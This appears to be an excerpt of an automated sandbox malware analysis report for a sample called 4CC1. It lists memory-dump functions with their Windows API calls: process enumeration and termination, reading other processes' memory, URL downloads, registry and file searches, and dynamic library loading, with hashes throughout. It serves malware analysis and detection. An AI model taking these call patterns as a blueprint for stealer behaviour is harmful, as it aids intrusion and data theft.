Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction ID: 367f00e3fac1ad323777d3cfb6a9c31bedb6582ea87d99118442d47bc1b8c7be
Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
Instruction Fuzzy Hash: 65019271701224AFE7215B30ACC9FEB777DEB88751F00119AF905D2290EFB48D908AA4

Function 0245E756 Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0245EB2A
lstrcpy.KERNEL32(00000000,?), ref: 0245EB5C
lstrcpy.KERNEL32(00000000,?), ref: 0245EBAB
lstrcpy.KERNEL32(00000000,?), ref: 0245EBD1
lstrcpy.KERNEL32(00000000,?), ref: 0245EC09
FindNextFileA.KERNEL32(00000000,?), ref: 0245EC3F
FindClose.KERNEL32(00000000), ref: 0245EC4E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 576a624393cf28840ac798ef37b12f03d180cc120e60138b502b5edf5e5873af
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: A7022A71B112218FDB28CF19C548B66B7E1AF44318F19C0AEDC899B3A2D772E942CF50

Function 0245E7DB Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0245EB2A
lstrcpy.KERNEL32(00000000,?), ref: 0245EB5C
lstrcpy.KERNEL32(00000000,?), ref: 0245EBAB
lstrcpy.KERNEL32(00000000,?), ref: 0245EBD1
lstrcpy.KERNEL32(00000000,?), ref: 0245EC09
FindNextFileA.KERNEL32(00000000,?), ref: 0245EC3F
FindClose.KERNEL32(00000000), ref: 0245EC4E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 576a624393cf28840ac798ef37b12f03d180cc120e60138b502b5edf5e5873af
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: A7022A71B112218FDB28CF19C548B66B7E1AF44318F19C0AEDC899B3A2D772E942CF50

Function 0245E7FC Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0245EB2A
lstrcpy.KERNEL32(00000000,?), ref: 0245EB5C
lstrcpy.KERNEL32(00000000,?), ref: 0245EBAB
lstrcpy.KERNEL32(00000000,?), ref: 0245EBD1
lstrcpy.KERNEL32(00000000,?), ref: 0245EC09
FindNextFileA.KERNEL32(00000000,?), ref: 0245EC3F
FindClose.KERNEL32(00000000), ref: 0245EC4E

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$CloseFileNext
String ID:
API String ID: 1875835556-0
Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction ID: 576a624393cf28840ac798ef37b12f03d180cc120e60138b502b5edf5e5873af
Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
Instruction Fuzzy Hash: A7022A71B112218FDB28CF19C548B66B7E1AF44318F19C0AEDC899B3A2D772E942CF50

Function 02472377 Relevance: 10.7, APIs: 7, Instructions: 224stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0247238A
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,02472686,00000000,00000000,00000000), ref: 024723B8
VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 02472408
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02472469

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtualstrlen
String ID:
API String ID: 3366127311-0
Opcode ID: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
Instruction ID: b00be1d81d83a48221a84bc14aad439a68e25fe75c2574986c2a90924fbc84c5
Opcode Fuzzy Hash: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
Instruction Fuzzy Hash: 6E71D071A001199BDB24CFA8DD54AEFB7B6EB88320F14813AED25E7340D774DD428BA0

Function 02457397 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 024573E5
GetProcessHeap.KERNEL32(00000008,00000010), ref: 02457420
RtlAllocateHeap.NTDLL(00000000), ref: 02457427
memcpy.MSVCRT(00000000,?), ref: 02457454
GetProcessHeap.KERNEL32(00000000,?), ref: 0245746A
HeapFree.KERNEL32(00000000), ref: 02457471
GetProcAddress.KERNEL32(00000000,?), ref: 024574D0

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
String ID:
API String ID: 413393563-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: 5bda17767cc7a832769f288deac3823a23cb94a6a78f545670c2b3db7f09b56f
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: 1E415C71A006159BDB20CF69DC847AAF7E9EB85319F14457AEC89C7301E771E800CAA0

Function 00417F60 Relevance: 10.6, APIs: 7, Instructions: 118stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00417F84
lstrlenA.KERNEL32(00000000), ref: 00417FB1
lstrcpy.KERNEL32(00000000,00000000), ref: 00417FE0
strtok_s.MSVCRT ref: 00417FF1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418025
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418053
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418087

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction ID: 476cfacc260c43b9b6707cb97608d97a847e356c1d56728458ea849191fa1f26
Opcode Fuzzy Hash: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction Fuzzy Hash: D0417F34A0450ADFCB21DF18D884EEB77B4FF44304F12409AE805AB351DB79AAA6CF95

Function 02468347 Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0246836C
lstrlen.KERNEL32(00000000), ref: 024683B2
lstrcpy.KERNEL32(00000000,00000000), ref: 024683E1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 024683F9
lstrlen.KERNEL32(00000000), ref: 02468437
lstrcpy.KERNEL32(00000000,00000000), ref: 02468466
strtok_s.MSVCRT ref: 02468476

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
Instruction ID: e15d848504afc12998d66d14f33f3dfb163d3ef134659cf22193d5c8773046d1
Opcode Fuzzy Hash: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
Instruction Fuzzy Hash: E54168716002069FCB21EF68D988BAABBF5EF44704F04801EEC49D7645EB74D989CFA1

Function 024557D7 Relevance: 10.6, APIs: 7, Instructions: 112networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 024557F0
RtlAllocateHeap.NTDLL(00000000), ref: 024557F7
InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 0245580D
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 02455828
InternetReadFile.WININET(?,?,00000400,00000001), ref: 02455853
InternetCloseHandle.WININET(?), ref: 02455892
InternetCloseHandle.WININET(00000000), ref: 02455899

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction ID: 67327ce0f310fd5e6fee4eac3e6a8af38a903f8f5a616e85d7cb30f2f0706bea
Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction Fuzzy Hash: A541AE70A00214AFDB24CF55CC48BAAB7B5FF48314F5480AEE9499B3A1D7B5A941CF94

Function 02474787 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 024747A1
GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,0246558F), ref: 024747CC
RtlAllocateHeap.NTDLL(00000000), ref: 024747D3
wsprintfW.USER32 ref: 024747E2
OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 02474851
TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 02474860
CloseHandle.KERNEL32(00000000,?,?), ref: 02474867

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
Instruction ID: 776a7537f1f5e04d8d2fbbe6f34ad73713e09cf2c2a650342b17c3f3e62f6dd3
Opcode Fuzzy Hash: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
Instruction Fuzzy Hash: E9318F71A00248BBDB10DFE5DC89FEEB77DAF44741F10005AFA15E7180DBB0A6408BA5

Function 02472A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02472A9C
RtlAllocateHeap.NTDLL(00000000), ref: 02472AA3

Part of subcall function 02472B17: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02472B2C
Part of subcall function 02472B17: RtlAllocateHeap.NTDLL(00000000), ref: 02472B33
Part of subcall function 02472B17: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02472AB0), ref: 02472B52
Part of subcall function 02472B17: RegQueryValueExA.ADVAPI32(02472AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 02472B6C
Part of subcall function 02472B17: RegCloseKey.ADVAPI32(02472AB0), ref: 02472B76

RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024697C7), ref: 02472AD8
RegQueryValueExA.ADVAPI32(024697C7,00638C34,00000000,00000000,00000000,000000FF), ref: 02472AF3
RegCloseKey.ADVAPI32(024697C7), ref: 02472AFD

Strings

Windows 11, xrefs: 02472AB7

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: dce8c4ad9b5b31b9b225d00edc8bd2f7ccdb400dadca3493562952861ab8dc96
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: 76018B71640309AFE714DBA4AC89EEA7B6EEB44315F00115ABE09D3290DAB09E448BE0

Function 02457C07 Relevance: 10.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02457977: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 024579AC
Part of subcall function 02457977: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 024579F1
Part of subcall function 02457977: strlen.MSVCRT ref: 02457A25
Part of subcall function 02457977: StrStrA.SHLWAPI(?,0043508C), ref: 02457A5F
Part of subcall function 02457977: strcpy_s.MSVCRT ref: 02457A88
Part of subcall function 02457977: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02457A93
Part of subcall function 02457977: HeapFree.KERNEL32(00000000), ref: 02457A9A
Part of subcall function 02457977: strlen.MSVCRT ref: 02457AA7

lstrcat.KERNEL32(00638E68,0043509C), ref: 02457C37
lstrcat.KERNEL32(00638E68,?), ref: 02457C64
lstrcat.KERNEL32(00638E68,004350A0), ref: 02457C76
lstrcat.KERNEL32(00638E68,?), ref: 02457C97
wsprintfA.USER32 ref: 02457CB7
lstrcpy.KERNEL32(00000000,?), ref: 02457CE0
lstrcat.KERNEL32(00638E68,00000000), ref: 02457CEE
lstrcat.KERNEL32(00638E68,0043509C), ref: 02457D07

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID:
API String ID: 2460923012-0
Opcode ID: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction ID: 9a3d27004d3c12d370817db0d010d6eff790955b75b96fa8a6931b0a20d21de0
Opcode Fuzzy Hash: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction Fuzzy Hash: 4931D572900224EFDB15DB64DC44AABF77ABB88714B14152EFE4993311DB74E840CBA0

Function 02476177 Relevance: 9.2, APIs: 6, Instructions: 212COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 024761C1
std::_Xinvalid_argument.LIBCPMT ref: 024761E0
memmove.MSVCRT(FFFFFFFF,00000000,00000000,?,?,00000000), ref: 0247623B
memcpy.MSVCRT(00000010,?,?), ref: 0247625F
memcpy.MSVCRT(00000000,?,?), ref: 02476274
std::_Xinvalid_argument.LIBCPMT ref: 02476367

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy$memmove
String ID:
API String ID: 1795094292-0
Opcode ID: f44e9e1724c6da771fc665a3531611520f0502b6d9b36b20f8faa41871339d50
Instruction ID: e68e14e3b5fad98aa38e7b43d3ea9d9e3932bebd8654f34fb8db2ffafe0a3bee
Opcode Fuzzy Hash: f44e9e1724c6da771fc665a3531611520f0502b6d9b36b20f8faa41871339d50
Instruction Fuzzy Hash: 00617430700A049BDB28DF5CD994A9EB7BBEB94304B65491AE4B1DB381D770AD81CB94

Function 0245A0A7 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0245A136
LocalAlloc.KERNEL32(00000040), ref: 0245A16E

Part of subcall function 02477477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02477495

lstrcpy.KERNEL32(00000000,0043520C), ref: 0245A279

Strings

@, xrefs: 0245A14F
@"C, xrefs: 0245A21A

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocalmemset
String ID: @$@"C
API String ID: 4098468873-2306624759
Opcode ID: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
Instruction ID: 83e8a58cbfafbc3c3e5a35a73a6833cdd11d591f3c5855999f5cda16b96115ec
Opcode Fuzzy Hash: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
Instruction Fuzzy Hash: C751C171A002789BDB10EFB5DC44B9E7BA5AF04318F14456BFD98AB242D7B4E901CF90

Function 0246DB27 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0246DB53
RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?,00000000,000000FE), ref: 0246DB73
RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,?,?), ref: 0246DB9A
RegCloseKey.ADVAPI32(?), ref: 0246DBA5
lstrcat.KERNEL32(?,?), ref: 0246DBCB
lstrcat.KERNEL32(?,00638968), ref: 0246DBDD

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 4a1af6a0b45cfe44b2eee7f251b24306f0ea58b01f04f9454eab07ea38461d91
Instruction ID: 5e6d7146bee428902bef9169d7303b3e09e22200d254cbcdafe456cc9eedac8d
Opcode Fuzzy Hash: 4a1af6a0b45cfe44b2eee7f251b24306f0ea58b01f04f9454eab07ea38461d91
Instruction Fuzzy Hash: 31415C716042499FD714EF25DC45FEA77E6AF84704F00882EB98C872A1DB71E948CF92

Function 0246EDA7 Relevance: 9.1, APIs: 6, Instructions: 113stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0246EDF2
lstrcpy.KERNEL32(00000000,?), ref: 0246EE27
lstrcat.KERNEL32(?,00000000), ref: 0246EE33
lstrcat.KERNEL32(?,00431D64), ref: 0246EE4A
lstrcat.KERNEL32(?,00638DF8), ref: 0246EE5B
lstrcat.KERNEL32(?,00431D64), ref: 0246EE6B

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: bc7e0632fca65abe3c63a7a274d646b798d9d3e00812ea250c76545d3e573360
Instruction ID: dc6bb79b81ad095f36cfe3620b9b58b9c7570fe6c38d43c29abaa1314ee4c190
Opcode Fuzzy Hash: bc7e0632fca65abe3c63a7a274d646b798d9d3e00812ea250c76545d3e573360
Instruction Fuzzy Hash: 5C415E71604254AFD354EF74DC45EEA77E6AF88304F00881EBE9987291DB74E9089F92

Function 02459D47 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,02451555), ref: 02459D61
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,02451555), ref: 02459D77
LocalAlloc.KERNEL32(00000040,?,?,?,?,02451555), ref: 02459D8E
ReadFile.KERNEL32(00000000,00000000,?,02451555,00000000,?,?,?,02451555), ref: 02459DA7
LocalFree.KERNEL32(?,?,?,?,02451555), ref: 02459DC7
CloseHandle.KERNEL32(00000000,?,?,?,02451555), ref: 02459DCE

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
Instruction ID: abec159dbb1f7c07bb9790781aafd2196b6ada2f296f449d6a6a236bfcbfc4ed
Opcode Fuzzy Hash: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
Instruction Fuzzy Hash: 741119B1600229AFEB10EFA8DC85ABB776EEB04744F10455AFD5197281DB70AD448BE0

Function 02457097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,004074D0,00000040,02457634), ref: 024570A7
memcpy.MSVCRT(?,00005A4D,000000F8,00000000), ref: 024570E3
GetProcessHeap.KERNEL32(00000008,?), ref: 0245711B
RtlAllocateHeap.NTDLL(00000000), ref: 02457122

Strings

@, xrefs: 02457097

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocateProcess
String ID: @
API String ID: 966719176-2766056989
Opcode ID: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
Instruction ID: 9216bee79b6f1c3d65e378f5fd2a183a6c9891e006fbffa51d692e85bccc8456
Opcode Fuzzy Hash: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
Instruction Fuzzy Hash: 93216D706007119FDB258B21CC84BBBB3E8EB40705F84447DE986CBB85EBB4E945CB90

Function 00408B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(004078EE,004088DD,03C3C3C3,00000401,004078EE,?,00000000,?,004078EE,80000001), ref: 00408B70
std::exception::exception.LIBCMT ref: 00408B8B
__CxxThrowException@8.LIBCMT ref: 00408BA0

Strings

x@, xrefs: 00408B7D, 00408B80
Pv@, xrefs: 00408B99

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

